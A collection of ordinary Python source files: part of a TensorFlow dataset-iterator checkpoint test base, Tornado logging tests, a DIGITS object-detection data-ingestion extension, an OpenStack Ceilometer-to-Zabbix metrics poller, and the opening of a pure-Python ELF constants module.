# `from_sparse_tensor_slices()`and related tests are deleted.
def run_core_tests(self, ds_fn, num_outputs, sparse_tensors=False):
"""Runs the core tests.
Args:
ds_fn: 0-argument function that returns a Dataset.
num_outputs: Total number of outputs expected from this Dataset.
sparse_tensors: Whether dataset is built from SparseTensor(s).
Raises:
AssertionError if any test fails.
"""
# NOTE: We disable all default optimizations in serialization tests in order
# to test the actual dataset in question.
options = dataset_ops.Options()
options.experimental_optimization.apply_default_optimizations = False
def ds_fn_no_opt():
return ds_fn().with_options(options)
self.verify_unused_iterator(
ds_fn_no_opt, num_outputs, sparse_tensors=sparse_tensors)
self.verify_fully_used_iterator(
ds_fn_no_opt, num_outputs, sparse_tensors=sparse_tensors)
self.verify_exhausted_iterator(
ds_fn_no_opt, num_outputs, sparse_tensors=sparse_tensors)
self.verify_multiple_breaks(
ds_fn_no_opt, num_outputs, sparse_tensors=sparse_tensors)
self.verify_reset_restored_iterator(
ds_fn_no_opt, num_outputs, sparse_tensors=sparse_tensors)
def verify_unused_iterator(self,
ds_fn,
num_outputs,
sparse_tensors=False,
verify_exhausted=True):
"""Verifies that saving and restoring an unused iterator works.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
sparse_tensors: See `run_core_tests`.
verify_exhausted: See `gen_outputs`.
Raises:
AssertionError if any test fails.
"""
self.verify_run_with_breaks(
ds_fn, [0],
num_outputs,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
def verify_fully_used_iterator(self, ds_fn, num_outputs,
sparse_tensors=False):
"""Verifies that saving and restoring a fully used iterator works.
Note that this only checks saving and restoring an iterator from which
`num_outputs` items have been produced but does not check for an
exhausted iterator, i.e., one from which an OutOfRange error has been
returned.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
sparse_tensors: See `run_core_tests`.
Raises:
AssertionError if test fails.
"""
self.verify_run_with_breaks(
ds_fn, [num_outputs], num_outputs, sparse_tensors=sparse_tensors)
def verify_exhausted_iterator(self, ds_fn, num_outputs, sparse_tensors=False):
"""Verifies that saving and restoring an exhausted iterator works.
An exhausted iterator is one which has returned an OutOfRange error.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
sparse_tensors: See `run_core_tests`.
Raises:
AssertionError if any test fails.
"""
self.gen_outputs(
ds_fn, [],
num_outputs,
verify_exhausted=True,
sparse_tensors=sparse_tensors)
actual = self.gen_outputs(
ds_fn, [],
0,
ckpt_saved=True,
verify_exhausted=True,
sparse_tensors=sparse_tensors)
self.assertEqual(len(actual), 0)
def verify_multiple_breaks(self,
ds_fn,
num_outputs,
num_breaks=10,
sparse_tensors=False,
verify_exhausted=True):
"""Attempts to save/restore at multiple break points.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
num_breaks: The number of break points. These are uniformly spread in
[0, num_outputs] both inclusive.
sparse_tensors: See `run_core_tests`.
verify_exhausted: See `gen_outputs`.
Raises:
AssertionError if any test fails.
"""
self.verify_run_with_breaks(
ds_fn,
self.gen_break_points(num_outputs, num_breaks),
num_outputs,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
def verify_reset_restored_iterator(self,
ds_fn,
num_outputs,
break_point=None,
sparse_tensors=False,
verify_exhausted=True):
"""Attempts to re-initialize a restored iterator.
This is useful when restoring a training checkpoint during validation.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
break_point: Break point. Optional. Defaults to num_outputs/2.
sparse_tensors: See `run_core_tests`.
verify_exhausted: See `gen_outputs`.
Raises:
AssertionError if any test fails.
"""
break_point = num_outputs // 2 if not break_point else break_point
# Collect ground truth containing all outputs.
expected = self.gen_outputs(
ds_fn, [],
num_outputs,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
# Skip some items and save checkpoint.
self.gen_outputs(
ds_fn, [],
break_point,
sparse_tensors=sparse_tensors,
verify_exhausted=False)
actual = []
# Restore from checkpoint and then run init_op.
with ops.Graph().as_default() as g:
saver = self._import_meta_graph()
init_op, get_next_op = self._get_iterator_ops_from_collection(
ds_fn, sparse_tensors=sparse_tensors)
get_next_op = remove_variants(get_next_op)
with self.session(graph=g) as sess:
self._initialize(init_op, sess)
self._restore(saver, sess)
self._initialize(init_op, sess)
for _ in range(num_outputs):
actual.append(sess.run(get_next_op))
if verify_exhausted:
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next_op)
self.match(expected, actual)
def verify_error_on_save(self,
ds_fn,
num_outputs,
error,
break_point=None,
sparse_tensors=False):
"""Attempts to save a non-saveable iterator.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
error: Declared error when trying to save iterator.
break_point: Break point. Optional. Defaults to num_outputs/2.
sparse_tensors: See `run_core_tests`.
Raises:
AssertionError if any test fails.
"""
break_point = num_outputs // 2 if not break_point else break_point
with ops.Graph().as_default() as g:
init_op, get_next_op, saver = self._build_graph(
ds_fn, sparse_tensors=sparse_tensors)
get_next_op = remove_variants(get_next_op)
with self.session(graph=g) as sess:
self._initialize(init_op, sess)
for _ in range(break_point):
sess.run(get_next_op)
with self.assertRaises(error):
self._save(sess, saver)
def verify_run_with_breaks(self,
ds_fn,
break_points,
num_outputs,
sparse_tensors=False,
verify_exhausted=True):
"""Verifies that ds_fn() produces the same outputs with and without breaks.
1. Builds a Dataset using `ds_fn` and produces `num_outputs` items from it
*without* stopping at break points.
2. Builds a Dataset using `ds_fn` and produces `num_outputs` items from it
with stopping at break points.
Deep matches outputs from 1 and 2.
Args:
ds_fn: See `gen_outputs`.
break_points: See `gen_outputs`.
num_outputs: See `gen_outputs`.
sparse_tensors: See `run_core_tests`.
verify_exhausted: See `gen_outputs`.
Raises:
AssertionError if any test fails.
"""
expected = self.gen_outputs(
ds_fn, [],
num_outputs,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
actual = self.gen_outputs(
ds_fn,
break_points,
num_outputs,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
self.match(expected, actual)
def gen_outputs(self,
ds_fn,
break_points,
num_outputs,
ckpt_saved=False,
sparse_tensors=False,
verify_exhausted=True,
save_checkpoint_at_end=True):
"""Generates elements from input dataset while stopping at break points.
Produces `num_outputs` outputs and saves the state of the iterator in the
Saver checkpoint.
Args:
ds_fn: 0-argument function that returns the dataset.
break_points: A list of integers. For each `break_point` in
`break_points`, we produce outputs till `break_point` number of items
have been produced and then checkpoint the state. The current graph
and session are destroyed and a new graph and session are used to
produce outputs till next checkpoint or till `num_outputs` elements
have been produced. `break_point` must be <= `num_outputs`.
num_outputs: The total number of outputs to produce from the iterator.
ckpt_saved: Whether a checkpoint already exists.
sparse_tensors: Whether dataset is built from SparseTensor(s).
verify_exhausted: Whether to verify that the iterator has been exhausted
after producing `num_outputs` elements.
save_checkpoint_at_end: Whether to save a checkpoint after producing all
outputs. If False, checkpoints are saved each break point but not at the
end. Note that checkpoints overwrite each other so there is always only
a single checkpoint available. Defaults to True.
Returns:
A list of `num_outputs` items.
"""
outputs = []
def get_ops():
if ckpt_saved:
saver = self._import_meta_graph()
init_op, get_next_op = self._get_iterator_ops_from_collection(
ds_fn, sparse_tensors=sparse_tensors)
else:
init_op, get_next_op, saver = self._build_graph(
ds_fn, sparse_tensors=sparse_tensors)
return init_op, get_next_op, saver
for i in range(len(break_points) + 1):
with ops.Graph().as_default() as g:
init_op, get_next_op, saver = get_ops()
get_next_op = remove_variants(get_next_op)
with self.session(graph=g) as sess:
if ckpt_saved:
self._initialize(init_op, sess)
self._restore(saver, sess)
else:
self._initialize(init_op, sess)
start = break_points[i - 1] if i > 0 else 0
end = break_points[i] if i < len(break_points) else num_outputs
num_iters = end - start
for _ in range(num_iters):
outputs.append(sess.run(get_next_op))
if i == len(break_points) and verify_exhausted:
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next_op)
if save_checkpoint_at_end or i < len(break_points):
self._save(sess, saver)
ckpt_saved = True
return outputs
def match(self, expected, actual):
"""Matches nested structures.
Recursively matches shape and values of `expected` and `actual`.
Handles scalars, numpy arrays and other python sequence containers
e.g. list, dict, as well as SparseTensorValue and RaggedTensorValue.
Args:
expected: Nested structure 1.
actual: Nested structure 2.
Raises:
AssertionError if matching fails.
"""
if isinstance(expected, np.ndarray):
expected = expected.tolist()
if isinstance(actual, np.ndarray):
actual = actual.tolist()
self.assertEqual(type(expected), type(actual))
if nest.is_sequence(expected):
self.assertEqual(len(expected), len(actual))
if isinstance(expected, dict):
for key1, key2 in zip(sorted(expected), sorted(actual)):
self.assertEqual(key1, key2)
self.match(expected[key1], actual[key2])
else:
for item1, item2 in zip(expected, actual):
self.match(item1, item2)
elif isinstance(expected, sparse_tensor.SparseTensorValue):
self.match((expected.indices, expected.values, expected.dense_shape),
(actual.indices, actual.values, actual.dense_shape))
elif isinstance(expected, ragged_tensor_value.RaggedTensorValue):
self.match((expected.values, expected.row_splits),
(actual.values, actual.row_splits))
else:
self.assertEqual(expected, actual)
def does_not_match(self, expected, actual):
with self.assertRaises(AssertionError):
self.match(expected, actual)
def gen_break_points(self, num_outputs, num_samples=10):
"""Generates `num_samples` breaks points in [0, num_outputs]."""
return np.linspace(0, num_outputs, num_samples, dtype=int)
def _build_graph(self, ds_fn, sparse_tensors=False):
iterator = dataset_ops.make_initializable_iterator(ds_fn())
saveable = contrib_iterator_ops.make_saveable_from_iterator(iterator)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, saveable)
init_op = iterator.initializer
if sparse_tensors:
get_next = sparse_tensor.SparseTensor(*iterator.get_next())
else:
get_next = iterator.get_next()
self._add_iterator_ops_to_collection(init_op, get_next, ds_fn,
sparse_tensors)
saver = saver_lib.Saver(allow_empty=True)
return init_op, get_next, saver
def _add_iterator_ops_to_collection(self,
init_op,
get_next,
ds_fn,
sparse_tensors=False):
ops.add_to_collection("iterator_ops", init_op)
# `get_next` may be a tuple e.g. in TensorSliceDataset. Since Collections
# do not support tuples we flatten the tensors and restore the shape in
# `_get_iterator_ops_from_collection`.
if sparse_tensors: # specific for deprecated `from_sparse_tensor_slices`.
ops.add_to_collection("iterator_ops", get_next.indices)
ops.add_to_collection("iterator_ops", get_next.values)
ops.add_to_collection("iterator_ops", get_next.dense_shape)
return
get_next_list = nest.flatten(get_next)
for i, output_class in enumerate(
nest.flatten(self._get_output_classes(ds_fn))):
if output_class is sparse_tensor.SparseTensor:
ops.add_to_collection("iterator_ops", get_next_list[i].indices)
ops.add_to_collection("iterator_ops", get_next_list[i].values)
ops.add_to_collection("iterator_ops", get_next_list[i].dense_shape)
else:
ops.add_to_collection("iterator_ops", get_next_list[i])
def _get_iterator_ops_from_collection(self, ds_fn, sparse_tensors=False):
all_ops = ops.get_collection("iterator_ops")
if sparse_tensors: # specific for deprecated `from_sparse_tensor_slices`.
init_op, indices, values, dense_shape = all_ops
return init_op, sparse_tensor.SparseTensor(indices, values, dense_shape)
get_next_list = []
i = 1
for output_class in nest.flatten(self._get_output_classes(ds_fn)):
if output_class is sparse_tensor.SparseTensor:
indices, values, dense_shape = all_ops[i:i + 3]
i += 3
get_next_list.append(
sparse_tensor.SparseTensor(indices, values, dense_shape))
else:
get_next_list.append(all_ops[i])
i += 1
return all_ops[0], nest.pack_sequence_as(
self._get_output_types(ds_fn), get_next_list)
def _get_output_types(self, ds_fn):
with ops.Graph().as_default():
return dataset_ops.get_legacy_output_types(ds_fn())
def _get_output_shapes(self, ds_fn):
with ops.Graph().as_default():
return dataset_ops.get_legacy_output_shapes(ds_fn())
def _get_output_classes(self, ds_fn):
with ops.Graph().as_default():
return dataset_ops.get_legacy_output_classes(ds_fn())
def _ckpt_path(self):
return os.path.join(self.get_temp_dir(), "iterator")
def _latest_ckpt(self):
return checkpoint_management.latest_checkpoint(self.get_temp_dir())
def _save(self, sess, saver):
saver.save(sess, self._ckpt_path())
def _restore(self, saver, sess):
sess.run(lookup_ops.tables_initializer())
saver.restore(sess, self._latest_ckpt())
def _initialize(self, init_op, sess):
sess.run(variables.global_variables_initializer())
sess.run(lookup_ops.tables_initializer())
sess.run(init_op)
def _import_meta_graph(self):
meta_file_path = self._ckpt_path() + ".meta"
return saver_lib.import_meta_graph(meta_file_path)
def _delete_ckpt(self):
# Remove all checkpoint files.
prefix = self._ckpt_path()
pattern = prefix + "*"
files = gfile.Glob(pattern)
map(gfile.Remove, files)
|
|
#!/usr/bin/env python
#
# Copyright 2012 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function
import contextlib
import glob
import logging
import os
import re
import subprocess
import sys
import tempfile
import warnings
from tornado.escape import utf8
from tornado.log import LogFormatter, define_logging_options, enable_pretty_logging
from tornado.options import OptionParser
from tornado.test.util import unittest
from tornado.util import basestring_type
@contextlib.contextmanager
def ignore_bytes_warning():
with warnings.catch_warnings():
warnings.simplefilter('ignore', category=BytesWarning)
yield
class LogFormatterTest(unittest.TestCase):
# Matches the output of a single logging call (which may be multiple lines
# if a traceback was included, so we use the DOTALL option)
LINE_RE = re.compile(b"(?s)\x01\\[E [0-9]{6} [0-9]{2}:[0-9]{2}:[0-9]{2} log_test:[0-9]+\\]\x02 (.*)")
def setUp(self):
self.formatter = LogFormatter(color=False)
# Fake color support. We can't guarantee anything about the $TERM
# variable when the tests are run, so just patch in some values
# for testing. (testing with color off fails to expose some potential
# encoding issues from the control characters)
self.formatter._colors = {
logging.ERROR: u"\u0001",
}
self.formatter._normal = u"\u0002"
# construct a Logger directly to bypass getLogger's caching
self.logger = logging.Logger('LogFormatterTest')
self.logger.propagate = False
self.tempdir = tempfile.mkdtemp()
self.filename = os.path.join(self.tempdir, 'log.out')
self.handler = self.make_handler(self.filename)
self.handler.setFormatter(self.formatter)
self.logger.addHandler(self.handler)
def tearDown(self):
self.handler.close()
os.unlink(self.filename)
os.rmdir(self.tempdir)
def make_handler(self, filename):
# Base case: default setup without explicit encoding.
# In python 2, supports arbitrary byte strings and unicode objects
# that contain only ascii. In python 3, supports ascii-only unicode
# strings (but byte strings will be repr'd automatically).
return logging.FileHandler(filename)
def get_output(self):
with open(self.filename, "rb") as f:
line = f.read().strip()
m = LogFormatterTest.LINE_RE.match(line)
if m:
return m.group(1)
else:
raise Exception("output didn't match regex: %r" % line)
def test_basic_logging(self):
self.logger.error("foo")
self.assertEqual(self.get_output(), b"foo")
def test_bytes_logging(self):
with ignore_bytes_warning():
# This will be "\xe9" on python 2 or "b'\xe9'" on python 3
self.logger.error(b"\xe9")
self.assertEqual(self.get_output(), utf8(repr(b"\xe9")))
def test_utf8_logging(self):
with ignore_bytes_warning():
self.logger.error(u"\u00e9".encode("utf8"))
if issubclass(bytes, basestring_type):
# on python 2, utf8 byte strings (and by extension ascii byte
# strings) are passed through as-is.
self.assertEqual(self.get_output(), utf8(u"\u00e9"))
else:
# on python 3, byte strings always get repr'd even if
# they're ascii-only, so this degenerates into another
# copy of test_bytes_logging.
self.assertEqual(self.get_output(), utf8(repr(utf8(u"\u00e9"))))
def test_bytes_exception_logging(self):
try:
raise Exception(b'\xe9')
except Exception:
self.logger.exception('caught exception')
# This will be "Exception: \xe9" on python 2 or
# "Exception: b'\xe9'" on python 3.
output = self.get_output()
self.assertRegexpMatches(output, br'Exception.*\\xe9')
# The traceback contains newlines, which should not have been escaped.
self.assertNotIn(br'\n', output)
class UnicodeLogFormatterTest(LogFormatterTest):
def make_handler(self, filename):
# Adding an explicit encoding configuration allows non-ascii unicode
# strings in both python 2 and 3, without changing the behavior
# for byte strings.
return logging.FileHandler(filename, encoding="utf8")
def test_unicode_logging(self):
self.logger.error(u"\u00e9")
self.assertEqual(self.get_output(), utf8(u"\u00e9"))
class EnablePrettyLoggingTest(unittest.TestCase):
def setUp(self):
super(EnablePrettyLoggingTest, self).setUp()
self.options = OptionParser()
define_logging_options(self.options)
self.logger = logging.Logger('tornado.test.log_test.EnablePrettyLoggingTest')
self.logger.propagate = False
def test_log_file(self):
tmpdir = tempfile.mkdtemp()
try:
self.options.log_file_prefix = tmpdir + '/test_log'
enable_pretty_logging(options=self.options, logger=self.logger)
self.assertEqual(1, len(self.logger.handlers))
self.logger.error('hello')
self.logger.handlers[0].flush()
filenames = glob.glob(tmpdir + '/test_log*')
self.assertEqual(1, len(filenames))
with open(filenames[0]) as f:
self.assertRegexpMatches(f.read(), r'^\[E [^]]*\] hello$')
finally:
for handler in self.logger.handlers:
handler.flush()
handler.close()
for filename in glob.glob(tmpdir + '/test_log*'):
os.unlink(filename)
os.rmdir(tmpdir)
def test_log_file_with_timed_rotating(self):
tmpdir = tempfile.mkdtemp()
try:
self.options.log_file_prefix = tmpdir + '/test_log'
self.options.log_rotate_mode = 'time'
enable_pretty_logging(options=self.options, logger=self.logger)
self.logger.error('hello')
self.logger.handlers[0].flush()
filenames = glob.glob(tmpdir + '/test_log*')
self.assertEqual(1, len(filenames))
with open(filenames[0]) as f:
self.assertRegexpMatches(
f.read(),
r'^\[E [^]]*\] hello$')
finally:
for handler in self.logger.handlers:
handler.flush()
handler.close()
for filename in glob.glob(tmpdir + '/test_log*'):
os.unlink(filename)
os.rmdir(tmpdir)
def test_wrong_rotate_mode_value(self):
try:
self.options.log_file_prefix = 'some_path'
self.options.log_rotate_mode = 'wrong_mode'
self.assertRaises(ValueError, enable_pretty_logging,
options=self.options, logger=self.logger)
finally:
for handler in self.logger.handlers:
handler.flush()
handler.close()
class LoggingOptionTest(unittest.TestCase):
"""Test the ability to enable and disable Tornado's logging hooks."""
def logs_present(self, statement, args=None):
# Each test may manipulate and/or parse the options and then logs
# a line at the 'info' level. This level is ignored in the
# logging module by default, but Tornado turns it on by default
# so it is the easiest way to tell whether tornado's logging hooks
# ran.
IMPORT = 'from tornado.options import options, parse_command_line'
LOG_INFO = 'import logging; logging.info("hello")'
program = ';'.join([IMPORT, statement, LOG_INFO])
proc = subprocess.Popen(
[sys.executable, '-c', program] + (args or []),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = proc.communicate()
self.assertEqual(proc.returncode, 0, 'process failed: %r' % stdout)
return b'hello' in stdout
def test_default(self):
self.assertFalse(self.logs_present('pass'))
def test_tornado_default(self):
self.assertTrue(self.logs_present('parse_command_line()'))
def test_disable_command_line(self):
self.assertFalse(self.logs_present('parse_command_line()',
['--logging=none']))
def test_disable_command_line_case_insensitive(self):
self.assertFalse(self.logs_present('parse_command_line()',
['--logging=None']))
def test_disable_code_string(self):
self.assertFalse(self.logs_present(
'options.logging = "none"; parse_command_line()'))
def test_disable_code_none(self):
self.assertFalse(self.logs_present(
'options.logging = None; parse_command_line()'))
def test_disable_override(self):
# command line trumps code defaults
self.assertTrue(self.logs_present(
'options.logging = None; parse_command_line()',
['--logging=info']))
|
|
# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
import csv
import operator
import os
import random
import StringIO
import numpy as np
import PIL.Image
import digits
from digits.utils import subclass, override, constants
from ..interface import DataIngestionInterface
from .forms import DatasetForm
from .utils import GroundTruth, GroundTruthObj
from .utils import bbox_to_array, pad_image, resize_bbox_list
TEMPLATE = "template.html"
@subclass
class DataIngestion(DataIngestionInterface):
"""
A data ingestion extension for an object detection dataset
"""
def __init__(self, **kwargs):
super(DataIngestion, self).__init__(**kwargs)
# this instance is automatically populated with form field
# attributes by superclass constructor
if self.custom_classes != '':
s = StringIO.StringIO(self.custom_classes)
reader = csv.reader(s)
self.class_mappings = {}
for idx, name in enumerate(reader.next()):
self.class_mappings[name.strip().lower()] = idx
else:
self.class_mappings = None
# this will be set when we know the phase we are encoding
self.ground_truth = None
@override
def encode_entry(self, entry):
"""
Return numpy.ndarray
"""
image_filename = entry
# (1) image part
# load from file (this returns a PIL image)
img = digits.utils.image.load_image(image_filename)
if self.channel_conversion != 'none':
if img.mode != self.channel_conversion:
# convert to different image mode if necessary
img = img.convert(self.channel_conversion)
# note: the form validator ensured that either none
# or both width/height were specified
if self.padding_image_width:
# pad image
img = pad_image(
img,
self.padding_image_height,
self.padding_image_width)
if self.resize_image_width is not None:
resize_ratio_x = float(self.resize_image_width) / img.size[0]
resize_ratio_y = float(self.resize_image_height) / img.size[1]
# resize and convert to numpy HWC
img = digits.utils.image.resize_image(
img,
self.resize_image_height,
self.resize_image_width)
else:
resize_ratio_x = 1
resize_ratio_y = 1
# convert to numpy array
img = np.array(img)
if img.ndim == 2:
# grayscale
img = img[np.newaxis, :, :]
if img.dtype == 'uint16':
img = img.astype(float)
else:
if img.ndim != 3 or img.shape[2] != 3:
raise ValueError("Unsupported image shape: %s" % repr(img.shape))
# HWC -> CHW
img = img.transpose(2, 0, 1)
# (2) label part
# make sure label exists
label_id = os.path.splitext(os.path.basename(entry))[0]
if not label_id in self.datasrc_annotation_dict:
raise ValueError("Label key %s not found in label folder" % label_id)
annotations = self.datasrc_annotation_dict[label_id]
# collect bbox list into bboxList
bboxList = []
for bbox in annotations:
# retrieve all vars defining groundtruth, and interpret all
# serialized values as float32s:
np_bbox = np.array(bbox.gt_to_lmdb_format())
bboxList.append(np_bbox)
bboxList = sorted(
bboxList,
key=operator.itemgetter(GroundTruthObj.lmdb_format_length()-1)
)
bboxList.reverse()
# adjust bboxes according to image cropping
bboxList = resize_bbox_list(bboxList, resize_ratio_x, resize_ratio_y)
# return data
feature = img
label = np.asarray(bboxList)
# LMDB compaction: now label (aka bbox) is the joint array
label = bbox_to_array(
label,
0,
max_bboxes=self.max_bboxes,
bbox_width=GroundTruthObj.lmdb_format_length())
return feature, label
@staticmethod
@override
def get_category():
return "Images"
@staticmethod
@override
def get_id():
return "image-object-detection"
@staticmethod
@override
def get_dataset_form():
return DatasetForm()
@staticmethod
@override
def get_dataset_template(form):
"""
parameters:
- form: form returned by get_dataset_form(). This may be populated with values if the job was cloned
return:
- (template, context) tuple
template is a Jinja template to use for rendering dataset creation options
context is a dictionary of context variables to use for rendering the form
"""
extension_dir = os.path.dirname(os.path.abspath(__file__))
template = open(os.path.join(extension_dir, TEMPLATE), "r").read()
context = {'form': form}
return (template, context)
@staticmethod
@override
def get_title():
return "Object Detection"
@override
def itemize_entries(self, stage):
"""
return list of image file names to encode for specified stage
"""
if stage == constants.TEST_DB:
# don't retun anything for the test stage
return []
elif stage == constants.TRAIN_DB:
# load ground truth
self.load_ground_truth(self.train_label_folder)
# get training image file names
return self.make_image_list(self.train_image_folder)
elif stage == constants.VAL_DB:
if self.val_image_folder != '':
# load ground truth
self.load_ground_truth(
self.val_label_folder,
self.val_min_box_size)
# get validation image file names
return self.make_image_list(self.val_image_folder)
else:
# no validation folder was specified
return []
else:
raise ValueError("Unknown stage: %s" % stage)
def load_ground_truth(self, folder, min_box_size=None):
"""
load ground truth from specified folder
"""
datasrc = GroundTruth(
folder,
min_box_size=min_box_size,
class_mappings=self.class_mappings)
datasrc.load_gt_obj()
self.datasrc_annotation_dict = datasrc.objects_all
scene_files = []
for key in self.datasrc_annotation_dict:
scene_files.append(key)
# determine largest label height:
self.max_bboxes = max([len(annotation) for annotation in self.datasrc_annotation_dict.values()])
def make_image_list(self, folder):
"""
find all supported images within specified folder and return list of file names
"""
image_files = []
for dirpath, dirnames, filenames in os.walk(folder, followlinks=True):
for filename in filenames:
if filename.lower().endswith(digits.utils.image.SUPPORTED_EXTENSIONS):
image_files.append('%s' % os.path.join(folder, filename))
if len(image_files) == 0:
raise ValueError("Unable to find supported images in %s" % folder)
# shuffle
random.shuffle(image_files)
return image_files
|
|
"""
Class for polling Ceilometer
This class provides means to requests for authentication tokens to be used with OpenStack's Ceilometer, Nova and RabbitMQ
"""
__authors__ = "Claudio Marques, David Palma, Luis Cordeiro"
__copyright__ = "Copyright (c) 2014 OneSource Consultoria Informatica, Lda"
__license__ = "Apache 2"
__contact__ = "www.onesource.pt"
__date__ = "01/09/2014"
__version__ = "1.0"
import struct
import urllib2
import json
import socket
from threading import Timer
class CeilometerHandler:
def __init__(self, ceilometer_api_port, polling_interval, template_name, ceilometer_api_host, zabbix_host,
zabbix_port, zabbix_proxy_name, keystone_auth):
"""
TODO
:type self: object
"""
self.ceilometer_api_port = ceilometer_api_port
self.polling_interval = int(polling_interval)
self.template_name = template_name
self.ceilometer_api_host = ceilometer_api_host
self.zabbix_host = zabbix_host
self.zabbix_port = zabbix_port
self.zabbix_proxy_name = zabbix_proxy_name
self.keystone_auth = keystone_auth
def run(self):
self.token = self.keystone_auth.getToken()
Timer(self.polling_interval, self.run, ()).start()
host_list = self.get_hosts_ID()
self.update_values(host_list)
def get_hosts_ID(self):
"""
Method used do query Zabbix API in order to fill an Array of hosts
:return: returns a array of servers and items to monitor by server
"""
data = {"request": "proxy config", "host": self.zabbix_proxy_name}
payload = self.set_proxy_header(data)
response = self.connect_zabbix(payload)
hosts_id = []
items = []
for line in response['hosts']['data']:
for line2 in response['items']['data']:
if line2[4] == line[0]:
items.append(line2[5])
hosts_id.append([line[0], line[1], items, line[7]])
items = []
return hosts_id
def update_values(self, hosts_id):
"""
TODO
:param hosts_id:
"""
for host in hosts_id:
links = []
if not host[1] == self.template_name:
print "Checking host:" + host[3]
#Get links for instance compute metrics
request = urllib2.urlopen(urllib2.Request(
"http://" + self.ceilometer_api_host + ":" + self.ceilometer_api_port +
"/v2/resources?q.field=resource_id&q.value=" + host[1],
headers={"Accept": "application/json", "Content-Type": "application/json",
"X-Auth-Token": self.token})).read()
# Filter the links to an array
for line in json.loads(request):
for line2 in line['links']:
if line2['rel'] in ('cpu', 'cpu_util', 'disk.read.bytes', 'disk.read.requests',
'disk.write.bytes', 'disk.write.requests'):
links.append(line2)
# Get the links regarding network metrics
request = urllib2.urlopen(urllib2.Request(
"http://" + self.ceilometer_api_host + ":" + self.ceilometer_api_port +
"/v2/resources?q.field=metadata.instance_id&q.value=" + host[1],
headers={"Accept": "application/json","Content-Type": "application/json",
"X-Auth-Token": self.token})).read()
# Add more links to the array
for line in json.loads(request):
for line2 in line['links']:
if line2['rel'] in ('network.incoming.bytes', 'network.incoming.packets',
'network.outgoing.bytes', 'network.outgoing.packets'):
links.append(line2)
# Query ceilometer API using the array of links
for line in links:
self.query_ceilometer(host[1], line['rel'], line['href'])
print " - Item " + line['rel']
def query_ceilometer(self, resource_id, item_key, link):
"""
TODO
:param resource_id:
:param item_key:
:param link:
"""
try:
global contents
contents = urllib2.urlopen(urllib2.Request(link + str("&limit=1"),
headers={"Accept": "application/json",
"Content-Type": "application/json",
"X-Auth-Token": self.token})).read()
except urllib2.HTTPError, e:
if e.code == 401:
print "401"
print "Error... \nToken refused! Please check your credentials"
elif e.code == 404:
print 'not found'
elif e.code == 503:
print 'service unavailable'
else:
print 'unknown error: '
response = json.loads(contents)
try:
counter_volume = response[0]['counter_volume']
self.send_data_zabbix(counter_volume, resource_id, item_key)
except:
pass
def connect_zabbix(self, payload):
"""
Method used to send information to Zabbix
:param payload: refers to the json message prepared to send to Zabbix
:rtype : returns the response received by the Zabbix API
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.zabbix_host, int(self.zabbix_port)))
s.send(payload)
# read its response, the first five bytes are the header again
response_header = s.recv(5, socket.MSG_WAITALL)
if not response_header == 'ZBXD\1':
raise ValueError('Got invalid response')
# read the data header to get the length of the response
response_data_header = s.recv(8, socket.MSG_WAITALL)
response_data_header = response_data_header[:4]
response_len = struct.unpack('i', response_data_header)[0]
# read the whole rest of the response now that we know the length
response_raw = s.recv(response_len, socket.MSG_WAITALL)
s.close()
response = json.loads(response_raw)
return response
def set_proxy_header(self, data):
"""
Method used to simplify constructing the protocol to communicate with Zabbix
:param data: refers to the json message
:rtype : returns the message ready to send to Zabbix server with the right header
"""
data_length = len(data)
data_header = struct.pack('i', data_length) + '\0\0\0\0'
HEADER = '''ZBXD\1%s%s'''
data_to_send = HEADER % (data_header, data)
payload = json.dumps(data)
return payload
def send_data_zabbix(self, counter_volume, resource_id, item_key):
"""
Method used to prepare the body with data from Ceilometer and send it to Zabbix using connect_zabbix method
:param counter_volume: the actual measurement
:param resource_id: refers to the resource ID
:param item_key: refers to the item key
"""
tmp = json.dumps(counter_volume)
data = {"request": "history data", "host": self.zabbix_proxy_name,
"data": [{"host": resource_id,
"key": item_key,
"value": tmp}]}
payload = self.set_proxy_header(data)
self.connect_zabbix(payload)
|
|
#===============================================================================
# libelf python implementation. Allow listing of sections/symbols.
#===============================================================================
import mmap
import struct
#===============================================================================
# Content of e_ident.
#===============================================================================
EI_NIDENT = 16 # Size of e_ident
EI_MAG0 = 0 # File identification byte 0 index
ELFMAG0 = 0x7f # Magic number byte 0
EI_MAG1 = 1 # File identification byte 1 index
ELFMAG1 = ord("E") # Magic number byte 1
EI_MAG2 = 2 # File identification byte 2 index
ELFMAG2 = ord("L") # Magic number byte 2
EI_MAG3 = 3 # File identification byte 3 index
ELFMAG3 = ord("F") # Magic number byte 3
EI_CLASS = 4 # File class
ELFCLASSNONE = 0 # Invalid class
ELFCLASS32 = 1 # 32-bit objects
ELFCLASS64 = 2 # 64-bit objects
EI_DATA = 5 # Data encoding
ELFDATANONE = 0 # Invalid data encoding
ELFDATA2LSB = 1 # 2's complement, little endian
ELFDATA2MSB = 2 # 2's complement, big endian
EI_VERSION = 6 # File version
EI_OSABI = 7 # Operating System/ABI indication
ELFOSABI_NONE = 0 # UNIX System V ABI
ELFOSABI_HPUX = 1 # HP-UX operating system
